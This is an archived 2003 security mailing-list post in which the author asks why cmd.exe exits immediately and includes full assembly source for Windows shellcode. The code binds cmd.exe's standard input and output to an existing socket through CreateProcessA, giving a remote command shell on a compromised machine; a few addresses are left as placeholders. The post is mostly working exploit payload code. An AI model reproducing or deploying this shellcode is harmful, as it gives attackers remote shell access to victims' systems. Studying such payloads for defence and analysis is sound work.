('binary' encoding is not supported, stored as-is) In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n> I wrote a little piece of shellcode that should spawn a shell using a socket in %ebp, which will execute cmd.exe succesfully. The problem is that cmd.exe dies right away. Has anybody got an idear why ? The source (asm for linux) is included. Kind regards, Berend-Jan Wever Start: MakeStringAndNegEbx: mov $',', %al xor %ecx, %ecx dec %ecx repne scasb # search for ',' sub %al, -1(%edi) neg %ebx ret GetLibraryAndProcAddress: # { push %edi # > libName mov $-0xXXXXXX, %ebx # call MakeStringAndNegEbx # put 0 after libName call *(%ebx) # < LoadLibraryA(libName); push %edi # > procName push %eax # > libHandle mov $-0xXXXXXX, %ebx # call MakeStringAndNegEbx # put 0 after ProcName call *(%ebx) # << GetProcAddress(libHandle, procName); ret # } main1: # %ebp = socket pop %edi # < %edi = &strings # create a struct StartupInfo on the stack. xor %eax, %eax push %ebp # HANDLE hStdError = socket push %ebp # HANDLE hStdOutput = socket push %ebp # HANDLE hStdInPut = socket push %eax # LPBYTE lpReserved2 = NULL inc %eax # WORD cbReserved2 = 0; push %eax # WORD wShowWindow = 1; mov %al, %ah # 0x101 push %eax # DWORD dwFlags = STARTF_USESHOWWINDOW | xor %eax, %eax # STARTF_USESTDHANDLES push %eax # DWORD dwFillAttribute = 0 push %eax # DWORD dwYCountChars = 0 push %eax # DWORD dwXCountChars = 0 push %eax # DWORD dwYSize = 0 push %eax # DWORD dwXSize = 0 push %eax # DWORD dwY = 0 push %eax # DWORD dwX = 0 push %eax # LPTSTR lpTitle = NULL (program name) push %eax # LPTSTR lpDesktop = NULL (inherit) push %eax # LPTSTR lpReserved = NULL mov $0x44, %al push %eax # DWORD cb = 0x44 (length); mov %esp, %esi # create a struct ProcessInformation on the stack. xor %eax, %eax push %eax # HANDLE hProcess; push %eax # HANDLE hThread; push %eax # DWORD dwProcessId; push %eax # DWORD dwThreadId; # create a process with STD I/O handles hooked to socket. push %esp # > lpProcessInformation -> stack push %esi # > lpStartupInfo -> stack push %eax # > lpCurrentDirecty: NULL push %eax # > lpEnvironment: NULL push %eax # > dwCreationFlags: 0 inc %eax push %eax # > bInheritHandles: 1 (true) dec %eax push %eax # > lpThreadAttributes: NULL push %eax # > lpProcessAttributes: NULL push %edi # > lpCommandLine: &('cmd.exe') push %eax # > lpApplicationName: NULL call MakeStringAndNegEbx # put 0 after commandline call GetLibraryAndProcAddress # LoadLibrary and GetProcAddress call *%eax # <<<<<<<<<< CreateProcess(...); InfinitLoop: jmp InfinitLoop # wait forever. EntryPoint: lea 0xXX(%esp), %eax # socket is on the stack at XX mov (%eax), %ebp # socket call main1 End: The code is followed by this string: "cmd.exe,kernel32.dll,CreateProcessA,"
This archive was generated by hypermail 2b30 : Wed Feb 05 2003 - 09:06:07 PST